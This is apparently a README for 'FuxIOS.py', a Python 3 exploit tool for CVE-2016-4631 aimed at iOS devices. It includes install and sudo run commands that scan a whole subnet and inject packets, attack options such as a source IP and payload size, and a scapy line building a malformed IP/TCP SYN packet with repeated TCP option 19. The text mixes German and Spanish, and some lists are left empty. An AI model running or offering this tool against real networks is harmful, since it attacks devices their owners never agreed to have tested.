
Modernisierter Python-3-Exploit-PoC für CVE-2016-4631, der auf iOS-Geräte abzielt. Bietet Netzwerk-Scanning, Generierung fehlerhafter IP/TCP-Payloads und Paketinjektion für autorisierte Sicherheitstests und Bildungszwecke.
¿Warum veröffentliche ich das jetzt?
Beim Durchsehen alter Festplatten und vergessener Repositorys bin ich auf dieses Skript gestoßen, das ich vor Jahren geschrieben habe, als ich gerade meine Karriere in der Cybersicherheit begann. Es war eine andere Zeit – Python 2.7 dominierte, Schwachstellen wie CVE-2016-4631 waren an der Tagesordnung, und jeder funktionierende PoC fühlte sich wie ein kleiner Sieg an.
Als ich diesen Code nach so langer Zeit sah, konnte ich nicht anders, als nostalgisch zu werden. Ich erinnerte mich an jene Nächte beim Debuggen von Exploits, die Aufregung, "Payload sent successfully" zu sehen, und wie jedes Skript ein weiterer Schritt in meinem Lernen war. Auch wenn ich heute mit viel fortschrittlicheren Technologien arbeite, repräsentiert dieses kleine Skript diese ersten Schritte in der Welt der offensiven Sicherheit.
Ich habe beschlossen, es zu modernisieren und hochzuladen, nicht nur aus Nostalgie, sondern weil ich glaube, dass es für andere nützlich sein kann, die gerade ihren Weg in die Cybersicherheit beginnen. Es ist eine Erinnerung daran, dass wir alle irgendwo anfangen und dass diese ersten "einfachen" Skripte die Grundlage für alles sind, was danach kommt.
F0LloW_Th3_R4ts war damals meine Signatur ... manche Codes vergisst man nie. 🐀
- BONKERS, Juli 2025
FuxIOS.py ist ein aktualisierter Proof of Concept (PoC) für die Schwachstelle CVE-2016-4631, die iOS-Geräte betrifft. Diese Version wurde vollständig für Python 3 neu geschrieben und modernisiert, mit erheblichen Verbesserungen bei Funktionalität, Sicherheit und Benutzerfreundlichkeit.
list_of_ips → list_ips# Instalar nmap (requerido por python-nmap)
# Windows: Descargar desde https://nmap.org/download.html
# Linux: sudo apt-get install nmap
# macOS: brew install nmap
# Clonar repositorio
git clone <repo-url>
cd FuxiOS
# Instalar dependencias
pip install -r requirements.txt
# O manualmente:
pip install scapy python-nmap
# Uso básico
sudo python3 FuxIOS.py
# Configuración personalizada
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24
# Opciones avanzadas
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24 -m 50 -d 0.1
# Ver ayuda
python3 FuxIOS.py -h
sudo python3 FuxIOS.py --interactive
-s, --source: IP-Quelle des Angriffs (Standard: 192.168.1.95)-n, --network: Ziel-Subnetz (Standard: 192.168.1.0/24)-m, --max-payload: Maximale Payload-Größe (Standard: 40)-d, --delay: Verzögerung zwischen Paketen in Sekunden (Standard: 0.2)--interactive: Interaktiver Modus für Kompatibilität# Paquete malicioso
IP(src=source_ip, dst=target_ip, options=malformed_payload) /
TCP(dport=80, flags="S", options=[(19, b"x"*18), (19, b"x"*18)])
Dieses Tool darf ausschließlich verwendet werden für:
Die Logs werden in fuxios_exploit.log gespeichert und enthalten:
Fehler: "No module named 'scapy'"
pip install scapy
Fehler: "No module named 'nmap'"
pip install python-nmap
# Y asegúrate de tener nmap instalado en el sistema
Fehler: "Permission denied"
# Linux/macOS
sudo python3 FuxIOS.py
# Windows
# Ejecutar PowerShell/CMD como administrador
Windows: "WinPcap/Npcap not found"
Dieses Projekt dient nur Bildungszwecken. Der Autor übernimmt keine Verantwortung für den Missbrauch dieses Tools.
Denk dran: "F0LloW_Th3_R4ts <:8)~~ <:8)~~"